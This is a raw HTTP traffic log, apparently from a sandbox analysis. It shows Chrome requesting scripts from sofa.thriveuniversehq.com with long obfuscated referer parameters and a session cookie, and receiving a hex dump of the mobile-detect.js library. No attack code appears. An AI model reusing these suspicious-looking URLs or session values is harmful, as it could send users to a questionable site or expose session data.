                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php?rpclk=kKkPwoNj0jiBH%2BtNEHYbBY%2FIgU%2By%2FtRXgUDJ6ipR1fPGjOtoXyRNxYs8BX6VqvAzrIg9pOgXjUJk8x9%2Bt0A%2FGkUc3Y7FK%2BzxfU1xLbwpncoX4QEEPNKeHkoGpdSmC06X9AutB9fPmCeVJ%2FxioY%2B%2FaeZQLzpDexEKo7QNhK7lxFPmr7FNiImBJD%2BJ2TMLxY4mFiI%2Bs5HSc9AOjOxP9ePSApGIjg%2BFTuEpEnzH518l7%2B3UDXULelrXOAU4rDQEw584WrOwmLgU2rjoJYiUlX%2BkHN%2F1GZWv41fRi1o1RsuaIaDjwP9G3MLnWd7gxCOXxl1sBLS0Bt4TO5kdsRhqvKx0i7gPAUjAv%2BTHkSjTU5VMWXVQ1D7yfytWJ4vjqJji8KMY2vA95PmeKRQXTh98zt7reu664F5tHC6PLSjWUDx3ZxYdbSIgzfV%2Bb4NsoUOa8jVNsAGB8aUlK6S6c3zMtcnn2ICXU9bfEJZ6tRhn8x1CWxZGPoJ9tLW4nlV%2FlLQE6SUfhJ%2BNyZsyz7QUeiM0H%2FdtsgmKv1yGuy21EHtCosnB2kogSUmv25twMntyWBvar88LMX4gLGk70C7r9t3P1ioZymlLRnJ5anyPEYWz8js7ycr85z33XojsZWd%2B%2BAfRhVqH5rnddMwEYCT5tJgJ5NB1Az5a8lalTFRTf8S4L%2FMz7zcjXdUSmDBdsD%2BooBKzE4IxaI1gbY1xSU4HE4TjmOfAYZY7pL7YWA%2BRc12UYf7bGSWzU4SL%2FQhqt67Nqq3Hayy0GT52%2BzTY5%2F2oyMKj8fNprIM534olb1cfC%2FAwRZsTZPQ4eecEohQ5MKWqcRI0BkbKwd5SARhv02qBuNjr8AYN85TnOAmLnEHrwhSd7NfCYvmuxPrAq05UVb8seW8Oa68a%2FzPHG%2FWUzTG8%2Fmfj33Y1%2B4hfQrD5Nr8OleZ91PDVowsbYdNHMY5tGoEF2eudTKC1%2F65WFV3LfJ0Kb9BVcc11O31D8gyZEHQ6hue8U9Cmyv1CdLKlsSghFjKHm50aFhzXUgQ%2F6YSAzHWjh26AF%2BXTT0rJmOaFWiT3xVclBE%2Fuvlfe0QPfPBtA11C40ZUlm5nKUxDcE7PQ5aFOS1xVGWH8zM6YBBTd7SNwenOIQLnqxQFCP0H3R%2FZgnFaWf0SPUZErjTWb5g3XynnxOB%2FRusUsa%2BEWmvhP0vmi4Gu8DiGeKFmwSCee%2FK2wuEDCqcC9kXt7%2BUo37er98qknkmXf2Aw%2F9b2ELDbk%2FKlLveMRGzaQFTqgsEh2aOuQofHQ6JwcU4qxiLKi0qxRPrI4eNsGrueSWdV3WoJ9rHOGT9pjcJcpbHAjfJbuJiaioukFhwqvt%2BmyotjQbYwFoFeAgB1w16swQ4mXrfagLznHUqwqagO48bOMdY3z%2BOz8dx3uBSoK7hMrXYbEC8DPQQlstcRNwIjNOLWda3X1ZlAH75iWbLzSwMQ9Pou%2FhzP5RLoQ8QQZrbLzf0Sg%2BI71Ob8RAOw3BWGWT%2B3LOIkw1DLHz%2Bq4Ol0iJRXqa4FBsmcdWveJuXikkGyeIZdH4Bv7aaZlhOI6DTqRDqU09rIYEpCzcgrCRkHR6vNmzYpRpNicqLOufOVYYu%2BBXseIpLUscXyqrsiVWTC4RaEof2TO4kosApJSR7xKckzb60M2TMc6Psp1GsWCBV60DYJFQKvPTUrb1Vf4kS1hstbNh6jzp33VDYn3KcOqdymTI3J9IJFhrVbmJ9xi5fL3ncEdY%2FBYD9ipL7wCn55xLGz3Rj1KghNnomC7M9hL03uOI4x2KD65die6YhLObI0E5ghleOyUa%2F8INk79PLNmOnB6vNc1trpjke6LhqAKl4fmlc6ZmO7%2FzI%2BX5FPhl0AADGAMPgb%2FY16AyC%2F9NHA0JUDiPD4Z8%2FRNJtY0Ce63XUnP8I9X2LayEOYmwqnN4jv%2FUJXaZ6e1f6gQxN5g%2BpQuvI8b%2FL%2FWCEfGqAt%2F6tAt5BP5gyZV7711TmuiPwisKuECDfivpsqVaxiJf4%2BXKaPur0lYZKxTgdLB2GkOeipHEYW%2BSyOjumq3RA79oMBQMegub9dOHI7Gfs6HtAbvOCB2E%2BjWf79rsdIkB0A9H%2BooeH7Kx70fmLfCnEdb8LYQbCudeMEFv12sID8fAaJx%2BCklhQJ2cY0l8U12GNMbxWof0YcR%2FuDKWvABD2i23EqytBIbUQfMb8HZUFmf%2BKFQA7%2BKwtjPDdDDMp1Xqq7wHwvHUQwERxtJ1pHDvfKkplLh3qPLbYibh1I%2BeVFRj0L%2BF1XKjiCVnYgJIYzO%2FBrGvBMok5jZ4ZRYhuxYJIiSHX8qOwos3%2BG2fpybd2ETADj1EQ7givHibP6egOW4kixEoJgS3QcchSqIvmeWBo4mGddqdQIPd%2BHZxs89TLhGHWWlMcIM4V%2B3SgEHXt6mFfj7aMXfgPyduvwx5iY1X%2FZKXvM9XBhWIKAd29vYYl3CSuSFO0wtW2B3KYpqmTw%2Bf72G6VQ1bnEY1d4wW%2FdX6YjKkNUpI%2Bm626sfqxB0ItTmyLHZ3BfzGHJQdffMJNduLQBBEmBrF49UI8tnZuMJHSn5lUjl1eEW%2BtW%2BnE6ClP%2FqqPW7cM91X4iwPR53JhAUbZASI5CIRgMv5po5bREQSNUJsPahC%2BXxBw%3D%3D%3A%3Ab76a4ddd668b8221d0b29b84fe1b8e47&p=OU88ie4lk0tb%2BbQ%2Ba8dRzdVt0WbPpQ%3D%3D%3A%3A4c8b9eba2c435fd063cb913ee9e2c7e9&oho=svylst.com&ptf=848bd2316dc3abc1c9b4aad2b173f936
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0
                                                          2023-11-27 03:23:50 UTC731INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 35 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 35 20 4f 63 74 20 32 30 32 33 20 32 30 3a 32 30 3a 30 34 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 39 32 61 38 2d 36 30 38 39 30 32 65 34 35 32 31 33 35 2d 67 7a 69 70 22 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:23:50 GMTContent-Type: application/javascriptTransfer-Encoding: chunkedConnection: closeLast-Modified: Wed, 25 Oct 2023 20:20:04 GMTETag: W/"92a8-608902e452135-gzip"Vary: Accept-EncodingCache-Contro
                                                          2023-11-27 03:23:50 UTC638INData Raw: 37 63 64 34 0d 0a 2f 2a 21 40 6c 69 63 65 6e 73 65 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 33 2c 20 48 65 69 6e 72 69 63 68 20 47 6f 65 62 6c 2c 20 4c 69 63 65 6e 73 65 3a 20 4d 49 54 2c 20 73 65 65 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 68 67 6f 65 62 6c 2f 6d 6f 62 69 6c 65 2d 64 65 74 65 63 74 2e 6a 73 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 28 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 61 26 26 6e 75 6c 6c 21 3d 62 26 26 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 61 2c 62 29 7b 76 61 72 20 63 2c 64 2c 65 3d
                                                          Data Ascii: 7cd4/*!@license Copyright 2013, Heinrich Goebl, License: MIT, see https://github.com/hgoebl/mobile-detect.js*/!function(a,b){a(function(){"use strict";function a(a,b){return null!=a&&null!=b&&a.toLowerCase()===b.toLowerCase()}function c(a,b){var c,d,e=
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 74 69 6f 6e 7c 45 76 6f 7c 56 69 73 69 6f 6e 7c 45 78 70 6c 6f 72 65 72 7c 36 38 30 30 7c 38 31 30 30 7c 38 39 30 30 7c 41 37 32 37 32 7c 53 35 31 30 65 7c 43 31 31 30 65 7c 4c 65 67 65 6e 64 7c 44 65 73 69 72 65 7c 54 38 32 38 32 29 7c 41 50 58 35 31 35 43 4b 54 7c 51 74 65 6b 39 30 39 30 7c 41 50 41 39 32 39 32 4b 54 7c 48 44 5f 6d 69 6e 69 7c 53 65 6e 73 61 74 69 6f 6e 2e 2a 5a 37 31 30 65 7c 50 47 38 36 31 30 30 7c 5a 37 31 35 65 7c 44 65 73 69 72 65 2e 2a 28 41 38 31 38 31 7c 48 44 29 7c 41 44 52 36 32 30 30 7c 41 44 52 36 34 30 30 4c 7c 41 44 52 36 34 32 35 7c 30 30 31 48 54 7c 49 6e 73 70 69 72 65 20 34 47 7c 41 6e 64 72 6f 69 64 2e 2a 5c 5c 62 45 56 4f 5c 5c 62 7c 54 2d 4d 6f 62 69 6c 65 20 47 31 7c 5a 35 32 30 6d 22 2c 4e 65 78 75 73 3a 22 4e 65
                                                          Data Ascii: tion|Evo|Vision|Explorer|6800|8100|8900|A7272|S510e|C110e|Legend|Desire|T8282)|APX515CKT|Qtek9090|APA9292KT|HD_mini|Sensation.*Z710e|PG86100|Z715e|Desire.*(A8181|HD)|ADR6200|ADR6400L|ADR6425|001HT|Inspire 4G|Android.*\\bEVO\\b|T-Mobile G1|Z520m",Nexus:"Ne
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 37 32 32 7c 47 54 2d 42 37 38 30 30 7c 47 54 2d 43 33 30 31 30 7c 47 54 2d 43 33 30 31 31 7c 47 54 2d 43 33 30 36 30 7c 47 54 2d 43 33 32 30 30 7c 47 54 2d 43 33 32 31 32 7c 47 54 2d 43 33 32 31 32 49 7c 47 54 2d 43 33 32 36 32 7c 47 54 2d 43 33 32 32 32 7c 47 54 2d 43 33 33 30 30 7c 47 54 2d 43 33 33 30 30 4b 7c 47 54 2d 43 33 33 30 33 7c 47 54 2d 43 33 33 30 33 4b 7c 47 54 2d 43 33 33 31 30 7c 47 54 2d 43 33 33 32 32 7c 47 54 2d 43 33 33 33 30 7c 47 54 2d 43 33 33 35 30 7c 47 54 2d 43 33 35 30 30 7c 47 54 2d 43 33 35 31 30 7c 47 54 2d 43 33 35 33 30 7c 47 54 2d 43 33 36 33 30 7c 47 54 2d 43 33 37 38 30 7c 47 54 2d 43 35 30 31 30 7c 47 54 2d 43 35 32 31 32 7c 47 54 2d 43 36 36 32 30 7c 47 54 2d 43 36 36 32 35 7c 47 54 2d 43 36 37 31 32 7c 47 54 2d 45 31
                                                          Data Ascii: 722|GT-B7800|GT-C3010|GT-C3011|GT-C3060|GT-C3200|GT-C3212|GT-C3212I|GT-C3262|GT-C3222|GT-C3300|GT-C3300K|GT-C3303|GT-C3303K|GT-C3310|GT-C3322|GT-C3330|GT-C3350|GT-C3500|GT-C3510|GT-C3530|GT-C3630|GT-C3780|GT-C5010|GT-C5212|GT-C6620|GT-C6625|GT-C6712|GT-E1
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 2d 53 37 30 37 30 7c 47 54 2d 53 37 32 30 30 7c 47 54 2d 53 37 32 32 30 7c 47 54 2d 53 37 32 33 30 7c 47 54 2d 53 37 32 33 33 7c 47 54 2d 53 37 32 35 30 7c 47 54 2d 53 37 35 30 30 7c 47 54 2d 53 37 35 33 30 7c 47 54 2d 53 37 35 35 30 7c 47 54 2d 53 37 35 36 32 7c 47 54 2d 53 37 37 31 30 7c 47 54 2d 53 38 30 30 30 7c 47 54 2d 53 38 30 30 33 7c 47 54 2d 53 38 35 30 30 7c 47 54 2d 53 38 35 33 30 7c 47 54 2d 53 38 36 30 30 7c 53 43 48 2d 41 33 31 30 7c 53 43 48 2d 41 35 33 30 7c 53 43 48 2d 41 35 37 30 7c 53 43 48 2d 41 36 31 30 7c 53 43 48 2d 41 36 33 30 7c 53 43 48 2d 41 36 35 30 7c 53 43 48 2d 41 37 39 30 7c 53 43 48 2d 41 37 39 35 7c 53 43 48 2d 41 38 35 30 7c 53 43 48 2d 41 38 37 30 7c 53 43 48 2d 41 38 39 30 7c 53 43 48 2d 41 39 33 30 7c 53 43 48 2d 41
                                                          Data Ascii: -S7070|GT-S7200|GT-S7220|GT-S7230|GT-S7233|GT-S7250|GT-S7500|GT-S7530|GT-S7550|GT-S7562|GT-S7710|GT-S8000|GT-S8003|GT-S8500|GT-S8530|GT-S8600|SCH-A310|SCH-A530|SCH-A570|SCH-A610|SCH-A630|SCH-A650|SCH-A790|SCH-A795|SCH-A850|SCH-A870|SCH-A890|SCH-A930|SCH-A
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 2d 45 33 33 35 7c 53 47 48 2d 45 35 39 30 7c 53 47 48 2d 45 36 33 35 7c 53 47 48 2d 45 37 31 35 7c 53 47 48 2d 45 38 39 30 7c 53 47 48 2d 46 33 30 30 7c 53 47 48 2d 46 34 38 30 7c 53 47 48 2d 49 32 30 30 7c 53 47 48 2d 49 33 30 30 7c 53 47 48 2d 49 33 32 30 7c 53 47 48 2d 49 35 35 30 7c 53 47 48 2d 49 35 37 37 7c 53 47 48 2d 49 36 30 30 7c 53 47 48 2d 49 36 30 37 7c 53 47 48 2d 49 36 31 37 7c 53 47 48 2d 49 36 32 37 7c 53 47 48 2d 49 36 33 37 7c 53 47 48 2d 49 36 37 37 7c 53 47 48 2d 49 37 30 30 7c 53 47 48 2d 49 37 31 37 7c 53 47 48 2d 49 37 32 37 7c 53 47 48 2d 69 37 34 37 4d 7c 53 47 48 2d 49 37 37 37 7c 53 47 48 2d 49 37 38 30 7c 53 47 48 2d 49 38 32 37 7c 53 47 48 2d 49 38 34 37 7c 53 47 48 2d 49 38 35 37 7c 53 47 48 2d 49 38 39 36 7c 53 47 48 2d 49
                                                          Data Ascii: -E335|SGH-E590|SGH-E635|SGH-E715|SGH-E890|SGH-F300|SGH-F480|SGH-I200|SGH-I300|SGH-I320|SGH-I550|SGH-I577|SGH-I600|SGH-I607|SGH-I617|SGH-I627|SGH-I637|SGH-I677|SGH-I700|SGH-I717|SGH-I727|SGH-i747M|SGH-I777|SGH-I780|SGH-I827|SGH-I847|SGH-I857|SGH-I896|SGH-I
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 2d 41 37 34 30 7c 53 50 48 2d 41 37 36 30 7c 53 50 48 2d 41 37 39 30 7c 53 50 48 2d 41 38 30 30 7c 53 50 48 2d 41 38 32 30 7c 53 50 48 2d 41 38 34 30 7c 53 50 48 2d 41 38 38 30 7c 53 50 48 2d 41 39 30 30 7c 53 50 48 2d 41 39 34 30 7c 53 50 48 2d 41 39 36 30 7c 53 50 48 2d 44 36 30 30 7c 53 50 48 2d 44 37 30 30 7c 53 50 48 2d 44 37 31 30 7c 53 50 48 2d 44 37 32 30 7c 53 50 48 2d 49 33 30 30 7c 53 50 48 2d 49 33 32 35 7c 53 50 48 2d 49 33 33 30 7c 53 50 48 2d 49 33 35 30 7c 53 50 48 2d 49 35 30 30 7c 53 50 48 2d 49 36 30 30 7c 53 50 48 2d 49 37 30 30 7c 53 50 48 2d 4c 37 30 30 7c 53 50 48 2d 4d 31 30 30 7c 53 50 48 2d 4d 32 32 30 7c 53 50 48 2d 4d 32 34 30 7c 53 50 48 2d 4d 33 30 30 7c 53 50 48 2d 4d 33 30 35 7c 53 50 48 2d 4d 33 32 30 7c 53 50 48 2d 4d 33
                                                          Data Ascii: -A740|SPH-A760|SPH-A790|SPH-A800|SPH-A820|SPH-A840|SPH-A880|SPH-A900|SPH-A940|SPH-A960|SPH-D600|SPH-D700|SPH-D710|SPH-D720|SPH-I300|SPH-I325|SPH-I330|SPH-I350|SPH-I500|SPH-I600|SPH-I700|SPH-L700|SPH-M100|SPH-M220|SPH-M240|SPH-M300|SPH-M305|SPH-M320|SPH-M3
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 4e 32 37 30 7c 55 4e 35 31 30 7c 55 4e 36 31 30 7c 55 53 36 37 30 7c 55 53 37 34 30 7c 55 53 37 36 30 7c 55 58 32 36 35 7c 55 58 38 34 30 7c 56 4e 32 37 31 7c 56 4e 35 33 30 7c 56 53 36 36 30 7c 56 53 37 30 30 7c 56 53 37 34 30 7c 56 53 37 35 30 7c 56 53 39 31 30 7c 56 53 39 32 30 7c 56 53 39 33 30 7c 56 58 39 32 30 30 7c 56 58 31 31 30 30 30 7c 41 58 38 34 30 41 7c 4c 57 37 37 30 7c 50 35 30 36 7c 50 39 32 35 7c 50 39 39 39 7c 45 36 31 32 7c 44 39 35 35 7c 44 38 30 32 7c 4d 53 33 32 33 29 22 2c 53 6f 6e 79 3a 22 53 6f 6e 79 53 54 7c 53 6f 6e 79 4c 54 7c 53 6f 6e 79 45 72 69 63 73 73 6f 6e 7c 53 6f 6e 79 45 72 69 63 73 73 6f 6e 4c 54 31 35 69 76 7c 4c 54 31 38 69 7c 45 31 30 69 7c 4c 54 32 38 68 7c 4c 54 32 36 77 7c 53 6f 6e 79 45 72 69 63 73 73 6f 6e 4d
                                                          Data Ascii: N270|UN510|UN610|US670|US740|US760|UX265|UX840|VN271|VN530|VS660|VS700|VS740|VS750|VS910|VS920|VS930|VX9200|VX11000|AX840A|LW770|P506|P925|P999|E612|D955|D802|MS323)",Sony:"SonyST|SonyLT|SonyEricsson|SonyEricssonLT15iv|LT18i|E10i|LT28h|LT26w|SonyEricssonM
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 32 7c 43 49 4e 4b 20 2b 7c 43 49 4e 4b 20 4b 49 4e 47 7c 43 49 4e 4b 20 50 45 41 58 7c 43 49 4e 4b 20 53 4c 49 4d 7c 53 55 42 4c 49 4d 22 2c 69 4d 6f 62 69 6c 65 3a 22 69 2d 6d 6f 62 69 6c 65 20 28 49 51 7c 69 2d 53 54 59 4c 45 7c 69 64 65 61 7c 5a 41 41 7c 48 69 74 7a 29 22 2c 53 69 6d 56 61 6c 6c 65 79 3a 22 5c 5c 62 28 53 50 2d 38 30 7c 58 54 2d 39 33 30 7c 53 58 2d 33 34 30 7c 58 54 2d 39 33 30 7c 53 58 2d 33 31 30 7c 53 50 2d 33 36 30 7c 53 50 36 30 7c 53 50 54 2d 38 30 30 7c 53 50 2d 31 32 30 7c 53 50 54 2d 38 30 30 7c 53 50 2d 31 34 30 7c 53 50 58 2d 35 7c 53 50 58 2d 38 7c 53 50 2d 31 30 30 7c 53 50 58 2d 38 7c 53 50 58 2d 31 32 29 5c 5c 62 22 2c 57 6f 6c 66 67 61 6e 67 3a 22 41 54 2d 42 32 34 44 7c 41 54 2d 41 53 35 30 48 44 7c 41 54 2d 41 53 34
                                                          Data Ascii: 2|CINK +|CINK KING|CINK PEAX|CINK SLIM|SUBLIM",iMobile:"i-mobile (IQ|i-STYLE|idea|ZAA|Hitz)",SimValley:"\\b(SP-80|XT-930|SX-340|XT-930|SX-310|SP-360|SP60|SPT-800|SP-120|SPT-800|SP-140|SPX-5|SPX-8|SP-100|SPX-8|SPX-12)\\b",Wolfgang:"AT-B24D|AT-AS50HD|AT-AS4
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 2d 50 37 33 39 7c 53 43 48 2d 49 39 32 35 7c 47 54 2d 49 39 32 30 30 7c 47 54 2d 50 35 32 30 30 7c 47 54 2d 50 35 32 31 30 7c 47 54 2d 50 35 32 31 30 58 7c 53 4d 2d 54 33 31 31 7c 53 4d 2d 54 33 31 30 7c 53 4d 2d 54 33 31 30 58 7c 53 4d 2d 54 32 31 30 7c 53 4d 2d 54 32 31 30 52 7c 53 4d 2d 54 32 31 31 7c 53 4d 2d 50 36 30 30 7c 53 4d 2d 50 36 30 31 7c 53 4d 2d 50 36 30 35 7c 53 4d 2d 50 39 30 30 7c 53 4d 2d 50 39 30 31 7c 53 4d 2d 54 32 31 37 7c 53 4d 2d 54 32 31 37 41 7c 53 4d 2d 54 32 31 37 53 7c 53 4d 2d 50 36 30 30 30 7c 53 4d 2d 54 33 31 30 30 7c 53 47 48 2d 49 34 36 37 7c 58 45 35 30 30 7c 53 4d 2d 54 31 31 30 7c 47 54 2d 50 35 32 32 30 7c 47 54 2d 49 39 32 30 30 58 7c 47 54 2d 4e 35 31 31 30 58 7c 47 54 2d 4e 35 31 32 30 7c 53 4d 2d 50 39 30 35 7c
                                                          Data Ascii: -P739|SCH-I925|GT-I9200|GT-P5200|GT-P5210|GT-P5210X|SM-T311|SM-T310|SM-T310X|SM-T210|SM-T210R|SM-T211|SM-P600|SM-P601|SM-P605|SM-P900|SM-P901|SM-T217|SM-T217A|SM-T217S|SM-P6000|SM-T3100|SGH-I467|XE500|SM-T110|GT-P5220|GT-I9200X|GT-N5110X|GT-N5120|SM-P905|


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          19192.168.2.549737104.21.1.74434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:50 UTC3676OUTGET /utils/banners/banner-bf.js?v=1.04 HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php?rpclk=kKkPwoNj0jiBH%2BtNEHYbBY%2FIgU%2By%2FtRXgUDJ6ipR1fPGjOtoXyRNxYs8BX6VqvAzrIg9pOgXjUJk8x9%2Bt0A%2FGkUc3Y7FK%2BzxfU1xLbwpncoX4QEEPNKeHkoGpdSmC06X9AutB9fPmCeVJ%2FxioY%2B%2FaeZQLzpDexEKo7QNhK7lxFPmr7FNiImBJD%2BJ2TMLxY4mFiI%2Bs5HSc9AOjOxP9ePSApGIjg%2BFTuEpEnzH518l7%2B3UDXULelrXOAU4rDQEw584WrOwmLgU2rjoJYiUlX%2BkHN%2F1GZWv41fRi1o1RsuaIaDjwP9G3MLnWd7gxCOXxl1sBLS0Bt4TO5kdsRhqvKx0i7gPAUjAv%2BTHkSjTU5VMWXVQ1D7yfytWJ4vjqJji8KMY2vA95PmeKRQXTh98zt7reu664F5tHC6PLSjWUDx3ZxYdbSIgzfV%2Bb4NsoUOa8jVNsAGB8aUlK6S6c3zMtcnn2ICXU9bfEJZ6tRhn8x1CWxZGPoJ9tLW4nlV%2FlLQE6SUfhJ%2BNyZsyz7QUeiM0H%2FdtsgmKv1yGuy21EHtCosnB2kogSUmv25twMntyWBvar88LMX4gLGk70C7r9t3P1ioZymlLRnJ5anyPEYWz8js7ycr85z33XojsZWd%2B%2BAfRhVqH5rnddMwEYCT5tJgJ5NB1Az5a8lalTFRTf8S4L%2FMz7zcjXdUSmDBdsD%2BooBKzE4IxaI1gbY1xSU4HE4TjmOfAYZY7pL7YWA%2BRc12UYf7bGSWzU4SL%2FQhqt67Nqq3Hayy0GT52%2BzTY5%2F2oyMKj8fNprIM534olb1cfC%2FAwRZsTZPQ4eecEohQ5MKWqcRI0BkbKwd5SARhv02qBuNjr8AYN85TnOAmLnEHrwhSd7NfCYvmuxPrAq05UVb8seW8Oa68a%2FzPHG%2FWUzTG8%2Fmfj33Y1%2B4hfQrD5Nr8OleZ91PDVowsbYdNHMY5tGoEF2eudTKC1%2F65WFV3LfJ0Kb9BVcc11O31D8gyZEHQ6hue8U9Cmyv1CdLKlsSghFjKHm50aFhzXUgQ%2F6YSAzHWjh26AF%2BXTT0rJmOaFWiT3xVclBE%2Fuvlfe0QPfPBtA11C40ZUlm5nKUxDcE7PQ5aFOS1xVGWH8zM6YBBTd7SNwenOIQLnqxQFCP0H3R%2FZgnFaWf0SPUZErjTWb5g3XynnxOB%2FRusUsa%2BEWmvhP0vmi4Gu8DiGeKFmwSCee%2FK2wuEDCqcC9kXt7%2BUo37er98qknkmXf2Aw%2F9b2ELDbk%2FKlLveMRGzaQFTqgsEh2aOuQofHQ6JwcU4qxiLKi0qxRPrI4eNsGrueSWdV3WoJ9rHOGT9pjcJcpbHAjfJbuJiaioukFhwqvt%2BmyotjQbYwFoFeAgB1w16swQ4mXrfagLznHUqwqagO48bOMdY3z%2BOz8dx3uBSoK7hMrXYbEC8DPQQlstcRNwIjNOLWda3X1ZlAH75iWbLzSwMQ9Pou%2FhzP5RLoQ8QQZrbLzf0Sg%2BI71Ob8RAOw3BWGWT%2B3LOIkw1DLHz%2Bq4Ol0iJRXqa4FBsmcdWveJuXikkGyeIZdH4Bv7aaZlhOI6DTqRDqU09rIYEpCzcgrCRkHR6vNmzYpRpNicqLOufOVYYu%2BBXseIpLUscXyqrsiVWTC4RaEof2TO4kosApJSR7xKckzb60M2TMc6Psp1GsWCBV60DYJFQKvPTUrb1Vf4kS1hstbNh6jzp33VDYn3KcOqdymTI3J9IJFhrVbmJ9xi5fL3ncEdY%2FBYD9ipL7wCn55xLGz3Rj1KghNnomC7M9hL03uOI4x2KD65die6YhLObI0E5ghleOyUa%2F8INk79PLNmOnB6vNc1trpjke6LhqAKl4fmlc6ZmO7%2FzI%2BX5FPhl0AADGAMPgb%2FY16AyC%2F9NHA0JUDiPD4Z8%2FRNJtY0Ce63XUnP8I9X2LayEOYmwqnN4jv%2FUJXaZ6e1f6gQxN5g%2BpQuvI8b%2FL%2FWCEfGqAt%2F6tAt5BP5gyZV7711TmuiPwisKuECDfivpsqVaxiJf4%2BXKaPur0lYZKxTgdLB2GkOeipHEYW%2BSyOjumq3RA79oMBQMegub9dOHI7Gfs6HtAbvOCB2E%2BjWf79rsdIkB0A9H%2BooeH7Kx70fmLfCnEdb8LYQbCudeMEFv12sID8fAaJx%2BCklhQJ2cY0l8U12GNMbxWof0YcR%2FuDKWvABD2i23EqytBIbUQfMb8HZUFmf%2BKFQA7%2BKwtjPDdDDMp1Xqq7wHwvHUQwERxtJ1pHDvfKkplLh3qPLbYibh1I%2BeVFRj0L%2BF1XKjiCVnYgJIYzO%2FBrGvBMok5jZ4ZRYhuxYJIiSHX8qOwos3%2BG2fpybd2ETADj1EQ7givHibP6egOW4kixEoJgS3QcchSqIvmeWBo4mGddqdQIPd%2BHZxs89TLhGHWWlMcIM4V%2B3SgEHXt6mFfj7aMXfgPyduvwx5iY1X%2FZKXvM9XBhWIKAd29vYYl3CSuSFO0wtW2B3KYpqmTw%2Bf72G6VQ1bnEY1d4wW%2FdX6YjKkNUpI%2Bm626sfqxB0ItTmyLHZ3BfzGHJQdffMJNduLQBBEmBrF49UI8tnZuMJHSn5lUjl1eEW%2BtW%2BnE6ClP%2FqqPW7cM91X4iwPR53JhAUbZASI5CIRgMv5po5bREQSNUJsPahC%2BXxBw%3D%3D%3A%3Ab76a4ddd668b8221d0b29b84fe1b8e47&p=OU88ie4lk0tb%2BbQ%2Ba8dRzdVt0WbPpQ%3D%3D%3A%3A4c8b9eba2c435fd063cb913ee9e2c7e9&oho=svylst.com&ptf=848bd2316dc3abc1c9b4aad2b173f936
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0
